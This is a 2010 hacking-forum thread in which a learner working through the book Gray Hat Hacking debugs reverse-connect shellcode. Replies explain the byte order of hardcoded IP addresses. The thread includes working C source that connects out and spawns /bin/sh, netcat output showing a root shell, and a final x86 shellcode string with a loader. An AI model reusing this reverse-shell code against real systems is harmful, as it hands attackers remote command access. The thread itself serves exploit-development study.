Results 1 to 4 of 4

Thread: Writing some shellcode, need a little help

  1. #1
    Junior Member g3ksan's Avatar
    Join Date
    Jan 2010
    Location
    Florida
    Posts
    93

    Default Writing some shellcode, need a little help

    Hey guys,

    I'm working through Gray Hat Hacking and I'm trying to write the reverse connect shellcode example in the book.

    The code originally had serv_addr.sin_addr.s_addr=0x650A0A0A; in it, which is 10.10.10.101. I figured it might be part of the environment in the book, so I changed it to 0x100000F7;, which is 127.0.0.1.

    The book has me run a netcat session as "nc -nlvv -p 49059" and then run the program, which should just connect to the netcat session. nc just sits there, and the program just sits there. When I do a netstat to see what's going on, I get:

    Code:
    #
    tcp        0      0 0.0.0.0:48059           0.0.0.0:*               LISTEN      15795/nc        
    #
    tcp        0      1 192.168.1.69:55624      247.0.0.16:48059        SYN_SENT    16187/reverse_conne
    Which is an external IANA reserved IP. When I change the code to reflect the book, it goes out to the proper IP that I hardcoded, which is 10.10.10.101 and when I hardcode my wlan0's IP, it goes out to 12.138.16.84 which is owned by ATT. When I turn off the internet, the code just exits.

    The book does not provide an environment to code in like Art of Exploitation does, so I'm trying it in BT4. I'm pretty much dumbfounded at this point, I'm not even sure how to troubleshoot this further. I understand if this is considered off topic.

    Thanks in advance!

    Source is below:

    Code:
    #include<sys/socket.h>
    #include<netinet/in.h>
    
    int main()
    {
    	char * shell[2];
    	int soc,remote;
    	struct sockaddr_in serv_addr;
    
    	serv_addr.sin_family=2;
    	serv_addr.sin_addr.s_addr=0x100000F7;
    	serv_addr.sin_port=0xBBBB;
    	soc=socket(2,1,0);
    	remote = connect(soc, (struct sockaddr*)&serv_addr, 0x10);
    	dup2(soc,0);
    	dup2(soc,1);
    	dup2(soc,2);
    	shell[0]="/bin/sh";
    	shell[1]=0;
    	execve(shell[0],shell,0);
    }
    Last edited by g3ksan; 07-22-2010 at 02:58 AM. Reason: forgot to write that source was below, etc.

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default Re: Writing some shellcode, need a little help

    Well it's been a while since my C code had to do this, but is s_addr in network byte order?

    Presumably you're compiling your program and sending it out, so why not inet_aton("127.0.0.1"); instead of 0x100000F7 to see what happens (assuming I got the right function call etc. but you know what to do).

    Beej's guide to network programming is golden for keeping this simple enough to read through. Then you can do your conversions and see how things go
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: Writing some shellcode, need a little help

    It appears to be specifying the address in reverse hex format.

    e.g. from the line of code as follows:

    Code:
    serv_addr.sin_addr.s_addr=0x100000F7;
    We obtain the address:

    Code:
    0x100000F7;
    Break this into 4 individual bytes

    Code:
    0x10, 0x00, 0x00, 0xF7
    The decimal equivalent of which is:

    Code:
    16, 0, 0, 247
    Reverse the order of the bytes to find the IP address:

    Code:
    247.0.0.16
    So if you wanted to connect to an address of 192.168.0.1 (as an example), take the individual values:

    Code:
    192, 168, 0, 1
    Reverse the order:

    Code:
    1, 0, 168, 192
    Convert to hex format:

    Code:
    0x01, 0x00, 0xA8, 0xC0
    Join together:

    Code:
    0x0100A8C0
    And modify the line of code to read as follows:

    Code:
    serv_addr.sin_addr.s_addr=0x0100A8C0;
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  4. #4
    Junior Member g3ksan's Avatar
    Join Date
    Jan 2010
    Location
    Florida
    Posts
    93

    Default

    lupin! thank you very much!

    I was using an online converter, thats what probably did me in. I need to memorize how to do that manually.

    edit: lupin, seriously thank you so much. You have no idea how long I've been staring at this wondering why.

    Code:
    listening on [127.0.0.1] 48059 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56527
    whoami
    root
    And the chapter is finished with a final conversion to opcode! Thank you again lupin, you really made my day

    Also, if you've been thinking about it, writing shellcode and simple exploits are not that hard! Get cracking!

    Code:
    char sc[]=
            "\x31\xc0\x31\xdb\x31\xd2\x50\x6a\x01\x6a\x02\x89"
            "\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc6\x52\x68\x7f"
            "\x00\x00\x01\x66\x68\xbb\xbb\x31\xc9\xb1\x02\x66"
            "\x51\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x03\xb0"
            "\x66\xcd\x80\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f"
            "\xcd\x80\x41\xb0\x3f\xcd\x80\x52\x68\x2f\x2f\x73"
            "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1"
            "\xb0\x0b\xcd\x80";
    
    main() {
            void (*fp) (void);
            fp = (void *)sc;
            fp();
    }
    Last edited by lupin; 07-22-2010 at 08:15 AM. Reason: Merging...

Similar Threads

  1. English Shellcode
    By Gitsnik in forum OLD General IT Discussion
    Replies: 0
    Last Post: 11-24-2009, 04:01 AM
  2. Problems with shellcode
    By Seppel_S in forum OLD Pentesting
    Replies: 1
    Last Post: 10-30-2009, 02:19 PM
  3. bindshell shellcode
    By kalyanboga in forum OLD Pentesting
    Replies: 7
    Last Post: 08-14-2009, 07:50 AM
  4. Shellcode help- hex to opcode
    By Siph0n in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 05-26-2008, 06:25 PM
  5. shellcode help
    By godlike in forum OLD Newbie Area
    Replies: 1
    Last Post: 02-15-2008, 06:07 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •